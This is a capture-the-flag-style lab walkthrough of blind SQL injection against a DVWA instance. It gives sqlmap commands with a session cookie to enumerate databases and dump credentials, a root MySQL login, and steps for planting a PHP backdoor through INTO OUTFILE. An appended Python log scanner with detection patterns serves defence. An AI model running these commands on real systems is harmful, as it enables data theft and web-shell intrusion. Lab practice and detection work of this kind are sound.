1. We go to the DVWA SQL Injection (Blind) page; the link is:
http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/

2. Identify the variable in the page's URL; this is the parameter sqlmap will inject into. The sqlmap command with that variable is:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --dbs

That was not successful, so we add the session cookie and try again:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --dbs

Now we get the list of databases:

3. We try to get a shell with --os-shell:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --os-shell

But it seems that was not successful either, so we try another way: accessing SQL directly.
4. Then we change the sqlmap options to retrieve the users and passwords from the SQL server:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --users --passwords

Finally we get the user and password. The SQL user and password are: root and NULL.
5. Now we connect through mysql:
root@elha:/ubuntu# mysql -h 192.168.56.101 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.1.33 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>

And then the list of databases:

6. Because we used DVWA in the earlier phase, we use DVWA's database to create another table, or another record in one of its tables.

Now we have that record:

7. Then we use INTO OUTFILE to write that record out as a PHP file, so that the web server will execute it.

8. Finally, we can test the backdoor and upload anything else.
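The sequence above leaves a recognisable trail in the web server's access log: the sqlmap user agent, boolean and time-based probes against the id parameter, and finally an INTO OUTFILE write. As an added example, not part of the original post, here is a small Python scanner that flags those patterns in constructed Apache combined-format log lines; the signature names and sample lines are my own assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample Apache combined-format log lines (not from the original post).
SAMPLE_LOG = """\
192.168.56.1 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.56.1 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 1532 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.56.1 - - [01/Jan/2024:10:00:06 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20AND%20SLEEP(5)&Submit=Submit HTTP/1.1" 200 1532 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.56.1 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%20INTO%20OUTFILE%20%27%2Ftmp%2Fx%27&Submit=Submit HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /dvwa/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [ts] "request" status size "referer" "user-agent"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                     r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
TOOL_UA = re.compile(r"sqlmap", re.I)
# Signatures matched against the URL-decoded query (names are assumptions for this example).
SQLI_SIGNATURES = {
    "boolean-tautology": r"\b(AND|OR)\b\s+\d+\s*=\s*\d+",   # blind boolean probes: AND 1=1
    "time-based": r"\b(SLEEP|BENCHMARK)\s*\(",              # blind time-based probes
    "union-select": r"\bUNION\b.*\bSELECT\b",
    "file-write": r"\bINTO\s+(OUT|DUMP)FILE\b",             # the step that drops the PHP file
    "file-read": r"\bLOAD_FILE\s*\(",
}

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec.pop("req").split()
    rec["method"] = parts[0] if parts else ""
    rec["url"] = parts[1] if len(parts) > 1 else ""
    return rec

def classify(rec):
    """Return the list of signature names that match this request."""
    hits = ["sqlmap-user-agent"] if TOOL_UA.search(rec["ua"]) else []
    decoded = unquote_plus(rec["url"])
    hits += [name for name, pat in SQLI_SIGNATURES.items() if re.search(pat, decoded, re.I)]
    return hits

def scan_log(text):
    """Return (ip, url, hits) for every flagged request, in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and (hits := classify(rec)):
            findings.append((rec["ip"], rec["url"], hits))
    return findings

def per_source_counts(findings):
    """Count flagged requests per client IP, to surface the scanning host."""
    return Counter(ip for ip, _, _ in findings)

if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(ip, ",".join(hits), url[:70])
    print(per_source_counts(scan_log(SAMPLE_LOG)))
```

Blocking the sqlmap user agent alone is not a fix: the last flagged line carries a browser user agent, so the query-string signatures and the per-source request rate are what matter.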

